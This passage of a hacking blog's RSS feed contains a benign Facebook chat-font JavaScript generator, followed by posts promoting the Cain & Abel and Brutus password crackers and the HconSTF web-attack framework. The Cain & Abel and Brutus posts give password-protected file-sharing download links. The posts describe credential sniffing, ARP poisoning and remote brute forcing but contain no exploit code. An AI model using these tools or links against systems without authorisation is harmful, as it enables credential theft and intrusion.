fonts[3]['O1'] = {code: '[[459611410745439]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc7/418875_459611410745439_2052297981_s.jpg'}; 
fonts[3]['O2'] = {code: '[[459611420745438]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc7/574627_459611420745438_499894718_s.jpg'}; 
fonts[3]['11'] = {code: '[[459611080745472]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/224597_459611080745472_1589470936_s.jpg'}; 
fonts[3]['12'] = {code: '[[459611084078805]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/376847_459611084078805_1371138696_s.jpg'}; 
fonts[3]['21'] = {code: '[[459611097412137]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/400465_459611097412137_1419146312_s.jpg'}; 
fonts[3]['22'] = {code: '[[459611104078803]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/394211_459611104078803_880971687_s.jpg'}; 
fonts[3]['31'] = {code: '[[459611117412135]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-prn1/546156_459611117412135_789670420_s.jpg'}; 
fonts[3]['32'] = {code: '[[459611127412134]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash3/549699_459611127412134_1488061230_s.jpg'}; 
fonts[3]['41'] = {code: '[[459611137412133]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc6/223870_459611137412133_31178551_s.jpg'}; 
fonts[3]['42'] = {code: '[[459611140745466]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/562674_459611140745466_2026190463_s.jpg'}; 
fonts[3]['51'] = {code: '[[459611144078799]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/205967_459611144078799_1450927233_s.jpg'}; 
fonts[3]['52'] = {code: '[[459611147412132]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-prn1/555686_459611147412132_321132550_s.jpg'}; 
fonts[3]['61'] = {code: '[[459611157412131]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/558391_459611157412131_1792641888_s.jpg'}; 
fonts[3]['62'] = {code: '[[459611160745464]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/409761_459611160745464_2006957782_s.jpg'}; 
fonts[3]['71'] = {code: '[[459611164078797]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash3/561716_459611164078797_1644286694_s.jpg'}; 
fonts[3]['72'] = {code: '[[459611180745462]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/582778_459611180745462_640023509_s.jpg'}; 
fonts[3]['81'] = {code: '[[459611197412127]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash3/557304_459611197412127_1407669070_s.jpg'}; 
fonts[3]['82'] = {code: '[[459611200745460]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc6/206052_459611200745460_713251502_s.jpg'}; 
fonts[3]['91'] = {code: '[[459611207412126]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/304559_459611207412126_78963103_s.jpg'}; 
fonts[3]['92'] = {code: '[[459611217412125]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/542274_459611217412125_1567263764_s.jpg'}; 
fonts[3]['C2'] = {code: '[[459611227412124]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash4/378658_459611227412124_59651825_s.jpg'}; 
fonts[3]['D1'] = {code: '[[459611230745457]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/408224_459611230745457_628321139_s.jpg'}; 
fonts[3]['D2'] = {code: '[[459611237412123]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/542439_459611237412123_1912896105_s.jpg'}; 
fonts[3]['E1'] = {code: '[[459611247412122]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/378597_459611247412122_980482613_s.jpg'}; 
fonts[3]['E2'] = {code: '[[459611260745454]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash3/578905_459611260745454_691799160_s.jpg'}; 
fonts[3]['F1'] = {code: '[[459611277412119]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/559103_459611277412119_1823656672_s.jpg'}; 
fonts[3]['F2'] = {code: '[[459611284078785]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/409588_459611284078785_1645650419_s.jpg'}; 
fonts[3]['G1'] = {code: '[[459611287412118]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-prn1/527968_459611287412118_1923870910_s.jpg'}; 
fonts[3]['G2'] = {code: '[[459611290745451]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/221822_459611290745451_172751086_s.jpg'}; 
fonts[3]['H1'] = {code: '[[459611297412117]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash3/527045_459611297412117_1360357242_s.jpg'}; 
fonts[3]['H2'] = {code: '[[459611300745450]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-prn1/538996_459611300745450_274649220_s.jpg'}; 
fonts[3]['I1'] = {code: '[[459611307412116]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/304947_459611307412116_1096672528_s.jpg'}; 
fonts[3]['I2'] = {code: '[[459611320745448]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash3/522080_459611320745448_1404963922_s.jpg'}; 
fonts[3]['J1'] = {code: '[[459611324078781]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc6/603524_459611324078781_2070731712_s.jpg'}; 
fonts[3]['J2'] = {code: '[[459611334078780]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/574500_459611334078780_2027218108_s.jpg'}; 
fonts[3]['K1'] = {code: '[[459611344078779]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/431136_459611344078779_1864052488_s.jpg'}; 
fonts[3]['K2'] = {code: '[[459611350745445]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/409605_459611350745445_1030605278_s.jpg'}; 
fonts[3]['L1'] = {code: '[[459611364078777]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc6/284614_459611364078777_1728332786_s.jpg'}; 
fonts[3]['L2'] = {code: '[[459611370745443]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/294630_459611370745443_51654473_s.jpg'}; 
fonts[3]['M1'] = {code: '[[459611374078776]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/309273_459611374078776_1899892190_s.jpg'}; 
fonts[3]['M2'] = {code: '[[459611387412108]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc7/394414_459611387412108_595799210_s.jpg'}; 
fonts[3]['N1'] = {code: '[[459611390745441]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-snc7/394495_459611390745441_411607901_s.jpg'}; 
fonts[3]['N2'] = {code: '[[459611407412106]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-snc7/294336_459611407412106_979551001_s.jpg'}; 
fonts[3]['O1'] = {code: '[[459611410745439]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc7/418875_459611410745439_2052297981_s.jpg'}; 
fonts[3]['O2'] = {code: '[[459611420745438]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc7/574627_459611420745438_499894718_s.jpg'}; 
fonts[3]['P1'] = {code: '[[459611444078769]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/424209_459611444078769_1024355225_s.jpg'}; 
fonts[3]['P2'] = {code: '[[459611460745434]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-ash3/553825_459611460745434_2000871133_s.jpg'}; 
fonts[3]['Q1'] = {code: '[[459611464078767]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash4/304772_459611464078767_453406848_s.jpg'}; 
fonts[3]['Q2'] = {code: '[[459611480745432]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/523224_459611480745432_1157081770_s.jpg'}; 
fonts[3]['R1'] = {code: '[[459611484078765]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/304772_459611484078765_511294534_s.jpg'}; 
fonts[3]['R2'] = {code: '[[459611490745431]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/419975_459611490745431_708107363_s.jpg'}; 
fonts[3]['S1'] = {code: '[[459611497412097]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-snc7/293471_459611497412097_457612846_s.jpg'}; 
fonts[3]['S2'] = {code: '[[459611500745430]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/305220_459611500745430_40990363_s.jpg'}; 
fonts[3]['T1'] = {code: '[[459611514078762]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/394357_459611514078762_2035573761_s.jpg'}; 
fonts[3]['T2'] = {code: '[[459611517412095]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash3/555512_459611517412095_82431865_s.jpg'}; 
fonts[3]['U1'] = {code: '[[459611520745428]]', image:'http://photos-c.ak.fbcdn.net/hphotos-ak-snc7/419900_459611520745428_750218709_s.jpg'}; 
fonts[3]['U2'] = {code: '[[459611527412094]]', image:'http://photos-e.ak.fbcdn.net/hphotos-ak-snc6/216158_459611527412094_79232212_s.jpg'}; 
fonts[3]['V1'] = {code: '[[459611530745427]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash3/540417_459611530745427_144394286_s.jpg'}; 
fonts[3]['V2'] = {code: '[[459611534078760]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-ash4/390935_459611534078760_2028738063_s.jpg'}; 
fonts[3]['W1'] = {code: '[[459611547412092]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-snc7/292951_459611547412092_505122097_s.jpg'}; 
fonts[3]['W2'] = {code: '[[459611550745425]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-ash3/556626_459611550745425_1963743665_s.jpg'}; 
fonts[3]['X1'] = {code: '[[459611557412091]]', image:'http://photos-h.ak.fbcdn.net/hphotos-ak-ash4/378296_459611557412091_1557807034_s.jpg'}; 
fonts[3]['X2'] = {code: '[[459611570745423]]', image:'http://photos-b.ak.fbcdn.net/hphotos-ak-snc7/599353_459611570745423_1820081446_s.jpg'}; 
fonts[3]['Y1'] = {code: '[[459611574078756]]', image:'http://photos-a.ak.fbcdn.net/hphotos-ak-prn1/542439_459611574078756_125273469_s.jpg'}; 
fonts[3]['Y2'] = {code: '[[459611580745422]]', image:'http://photos-g.ak.fbcdn.net/hphotos-ak-ash3/554768_459611580745422_680412445_s.jpg'}; 
fonts[3]['Z1'] = {code: '[[459611590745421]]', image:'http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/305035_459611590745421_693157191_s.jpg'}; 
fonts[3]['Z2'] = {code: '[[459611600745420]]', image:'http://photos-f.ak.fbcdn.net/hphotos-ak-snc7/292953_459611600745420_720562616_s.jpg'};


function filterInput($input, $fontIndex)
{
 $result = "";
 
 $isSimpleFont = $fontIndex &lt; 3;
 
 $temp = $input.toUpperCase();
 
 for(var i = 0; i &lt; $temp.length; i++)
 {
  $sm = $temp.substr(i,2);
  
  if ($sm == "&lt;3")
  {
   $result = $result + "a";
   i++;
  }
  else if ($sm == ":)")
  {
   $result = $result + "b";
   i++;
  }
  else
  {
   if ($isSimpleFont)
   {
    if (fonts[$fontIndex][$temp[i]] != undefined)
    {
     $result = $result + $temp[i];
    }
   }
   else if (fonts[$fontIndex][$temp[i] + "1"] != undefined)
   {
    $result = $result + $temp[i];
   }
  } 
 }
 
 return $result;
}

function ajaxFunction()
{

 $fontIndex = $("#fontSelect").val();
 $isSimpleFont = $fontIndex &lt; 3;

 $input =  filterInput($("#inputText").val(),$fontIndex);
 $("#imageList").html("");
 
 $words = $input.split(" ");
 
 $result= "";
 $firstRow = "";
 $secondRow = "";
 
 $currentInRow = 0;
 
 for (var i = 0; i &lt; $words.length; i++)
 {
  $chars=$words[i].split("");
    
  // Check if the next word fits into the current line
  if ($currentInRow + $chars.length &gt; 11)
  {
   // Put a line break only if it's middle of the line
   if ($currentInRow &gt; 0)
   {
    if ($isSimpleFont)
    {
     $result = $result + "\r\n"; 
    }
    else
    {
     $result = $result + $firstRow + "\r\n" + $secondRow  + "\r\n";
     $firstRow = "";
     $secondRow = "";
     $("#imageList").append("&lt;br/&gt;");

    }
    $("#imageList").append("&lt;br/&gt;");
    $currentInRow = 0;
   }
  }
  else
  {
   // If there wasn't a line break after the previous word, put a space character
   if (i!=0)
   { 
    if ($isSimpleFont)
    {
     $result= $result + " " + fonts[$fontIndex][' '].code + " ";
     $("#imageList").append('&lt;img src=' + fonts[$fontIndex][' '].image + ' width="16px" height="16px"/&gt;');
    }
    else
    {
     $firstRow = $firstRow + " " + fonts[$fontIndex][' 1'].code + " ";
     $secondRow = $secondRow + " " + fonts[$fontIndex][' 2'].code + " ";
     $("#imageList").append('&lt;div style="width: 16px; float:left;"&gt;&lt;img src=' + fonts[$fontIndex][' 1'].image + ' width="16px" height="16px"/&gt;&lt;img src=' + fonts[$fontIndex][' 2'].image + ' width="16px" height="16px"/&gt;&lt;/div&gt;')
     
     //TODO: add image to imagelist
    }
    
    $currentInRow++;
   }
  }
  
  for (var j = 0; j &lt; $chars.length; j++)
  {
  
   if ($currentInRow == 12)
   {
    if ($isSimpleFont)
    {
     $result = $result + "\r\n"; 
    }
    else
    {
     $result = $result + $firstRow + "\r\n" + $secondRow  + "\r\n";
     $firstRow = "";
     $secondRow = "";
     $("#imageList").append("&lt;br/&gt;");
    }
    $("#imageList").append("&lt;br/&gt;");
    $currentInRow = 0;
   }
   
   if (j != 0)
   {
    if ($isSimpleFont)
    {
     $result = $result + " ";
     
    }
    else
    {
     $firstRow = $firstRow + " ";
     $secondRow = $secondRow + " ";
    }
    
   }
   
   if ($isSimpleFont)
   {
    $result = $result + fonts[$fontIndex][$chars[j]].code;
    $("#imageList").append('&lt;img src=' + fonts[$fontIndex][$chars[j]].image + ' width="16px" height="16px"/&gt;');
   }
   else
   {
    $firstRow = $firstRow + fonts[$fontIndex][$chars[j]+'1'].code;
    $secondRow = $secondRow + fonts[$fontIndex][$chars[j]+'2'].code;
    $("#imageList").append('&lt;div style="width: 16px; float:left;"&gt;&lt;img src=' + fonts[$fontIndex][$chars[j]+'1'].image + ' width="16px" height="16px"/&gt;&lt;img src=' + fonts[$fontIndex][$chars[j]+'2'].image + ' width="16px" height="16px"/&gt;&lt;/div&gt;')
   }
   
   $currentInRow++;
  }
  
  
  
  //$currentInRow += $chars.length;
 }
 
 if ($firstRow!= "")
  {
   $result = $result + $firstRow + "\r\n" + $secondRow;
  }
 
 $("#chatCodesResult").val($result);

}


&lt;/script&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh599ZRHuYbm0JutyVXSBMvCpgsyv45s0oGtXOtXngwMZqB0FeV-8tYoFWaP-pybJ-uZojXqyqUnvp24ihKEI7ZMHcRs1YQe0nw8hIrufJxT7xXQgwSbVg2DepVlxxiAGwCJ3vfMVHVJ-Jj/s72-c/images.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Cain &amp; Abel – Download the Super Fast and Flexible Password Cracker with Network Sniffing</title><link>http://hackrich.blogspot.com/2012/07/cain-abel-download-super-fast-and.html</link><category>Abel</category><category>brute force</category><category>brute forcing.</category><category>Cain</category><category>Cain and Abel</category><category>network-sniffing</category><category>Password Cracking</category><category>Password Recovery</category><category>password-auditing</category><category>password-cracker</category><category>Windows</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 25 Jul 2012 22:38:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-4258670328588204256</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;Cain &amp;amp; Abel&lt;/span&gt;&lt;/b&gt; &lt;/span&gt;&lt;span style="color: #351c75;"&gt;has some awesome stuff built in like native network sniffing and network password grabbing.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Cain &amp;amp; Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLihr84BNWgpHChr5Nt04DzhBlRmgaBJoAxGUzYGITcugWrHEV1TFXSRBDkb3MF7VRRaUdteePNCoPUTF57yP2FOrrZYRvXZ5j7mL1Mfx2K6aHhGhKmoT7wbkNMDoPgVDDWBBVdgaXyX9P/s1600/cainabel.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLihr84BNWgpHChr5Nt04DzhBlRmgaBJoAxGUzYGITcugWrHEV1TFXSRBDkb3MF7VRRaUdteePNCoPUTF57yP2FOrrZYRvXZ5j7mL1Mfx2K6aHhGhKmoT7wbkNMDoPgVDDWBBVdgaXyX9P/s400/cainabel.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Cain &amp;amp; Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;You can download Cain &amp;amp; Abel v4.9.4 for Windows NT/2000/XP here:&lt;/span&gt;&lt;br /&gt;
►&amp;nbsp;&lt;a href="http://www.4shared.com/zip/cgLwnvd7/caIN_setup_HACKRICH.html" target="_blank"&gt;Cain &amp;amp; Abel &lt;/a&gt;&amp;nbsp;◄&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #660000;"&gt;Password: &lt;b&gt;HACKRICH.BLOGSPOT.COM&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLihr84BNWgpHChr5Nt04DzhBlRmgaBJoAxGUzYGITcugWrHEV1TFXSRBDkb3MF7VRRaUdteePNCoPUTF57yP2FOrrZYRvXZ5j7mL1Mfx2K6aHhGhKmoT7wbkNMDoPgVDDWBBVdgaXyX9P/s72-c/cainabel.gif" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>Brutus Password Cracker</title><link>http://hackrich.blogspot.com/2012/07/brutus-password-cracker.html</link><category>brutus</category><category>brutus-aet2</category><category>brutus-aet2.zip</category><category>brutus-password-cracker</category><category>Hacking Tools</category><category>hacking-software</category><category>password breakers/crackers</category><category>Password Cracking</category><category>password-auditing</category><category>password-cracker</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 24 Jul 2012 17:50:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6458310159985097737</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;span style="color: #990000; font-size: large;"&gt;Brutus&lt;/span&gt;&lt;span style="color: #8e7cc3;"&gt; is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGG7u8ICawFq0FtHaKnhrPqbnXc3SYFkme46bAUOWpxbkgq3OjLpk-x6EeLk6XUEyb27CvdHSYvNbvjH0jlPKdUWmDMfvMD7kQtNUdXk_carXpLavDyJ9rR6sxdXhp1e-PtQa104U9XPA/s1600/BRU.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGG7u8ICawFq0FtHaKnhrPqbnXc3SYFkme46bAUOWpxbkgq3OjLpk-x6EeLk6XUEyb27CvdHSYvNbvjH0jlPKdUWmDMfvMD7kQtNUdXk_carXpLavDyJ9rR6sxdXhp1e-PtQa104U9XPA/s640/BRU.jpg" width="532" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;Brutus was written originally to help me check routers etc. for default and common passwords.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;Features&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;Brutus version AET2 is the current release and includes the following authentication types :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;HTTP (Basic Authentication)&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;HTTP (HTML Form/CGI)&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;POP3&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;FTP&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;SMB&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Telnet&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8e7cc3;"&gt;The current release includes the following functionality :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Multi-stage authentication engine&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;60 simultaneous target connections&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;No username, single username and multiple username modes&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Password list, combo (user/password) list and configurable brute force modes&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Highly customisable authentication sequences&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Load and resume position&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Import and Export custom authentication types as BAD files seamlessly&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;SOCKS proxy support for all authentication types&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;User and password list generation and manipulation functionality&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;HTML Form interpretation for HTML Form/CGI authentication types&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;Error handling and recovery capability inc. resume after crash/failure.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #990000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #990000;"&gt;You can download it here:&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.4shared.com/zip/FTP5sQVm/brutus-aet2.html" target="_blank"&gt;Brutus Aet-2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #660000;"&gt;Password:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;HACKRICH.BLOGSPOT.COM&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGG7u8ICawFq0FtHaKnhrPqbnXc3SYFkme46bAUOWpxbkgq3OjLpk-x6EeLk6XUEyb27CvdHSYvNbvjH0jlPKdUWmDMfvMD7kQtNUdXk_carXpLavDyJ9rR6sxdXhp1e-PtQa104U9XPA/s72-c/BRU.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hcon Security Testing Framework (HconSTF) v0.4 – Fire Base</title><link>http://hackrich.blogspot.com/2012/07/hcon-security-testing-framework-hconstf.html</link><category>coding</category><category>Dictionary</category><category>education</category><category>Ethical hacker/hacking</category><category>Exploits and Incident Handling</category><category>find the vulnerability</category><category>HACKING WINDOWS</category><category>HconSTF</category><category>password breakers/crackers</category><category>Session hijacking</category><category>Windows</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 23 Jul 2012 20:40:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-4563170613017545301</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #990000; font-size: large;"&gt;HconSTF&lt;/span&gt;&lt;span style="color: #674ea7;"&gt; is an Open Source Penetration Testing Framework based on different browser technologies, Which helps any security professional to assists in the Penetration testing or vulnerability scanning assessment. It contains webtools which are capable of carrying out XSS attacks, SQL Injection, siXSS, CSRF, Trace XSS, RFI, LFI, etc. It could prove useful to anybody interested in the information security domain – students, security professionals, web developers and so on...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfhNV_OlUvbp-AJU162ujTSqjMUWRcqwsgEbXhG2_N6umV6RICcLYw0Azws2i5H-_r2g4r9a6dT6xg-VF9xMb3f3B2PJ4VRX6ppw6iI_lOyITN8DYGb-AGhOjYy2OVXSqpPc4E9nWOSqD_/s1600/HconSTF_main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfhNV_OlUvbp-AJU162ujTSqjMUWRcqwsgEbXhG2_N6umV6RICcLYw0Azws2i5H-_r2g4r9a6dT6xg-VF9xMb3f3B2PJ4VRX6ppw6iI_lOyITN8DYGb-AGhOjYy2OVXSqpPc4E9nWOSqD_/s640/HconSTF_main.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #351c75; font-size: large;"&gt;Features :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Categorized and comprehensive toolset&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp;Contains hundreds of tools and features and script for different tasks like SQLi, XSS, Dorks, OSINT to name a few&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; HconSTF webUI with online tools (same as the Aqua base version of HconSTF)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Each and every option is configured for penetration testing and Vulnerability assessments&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Specially configured and enhanced for gaining easy &amp;amp; solid anonymity&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Works for web app testing assessments specially for OWASP top 10&lt;/span&gt;&lt;/li&gt;
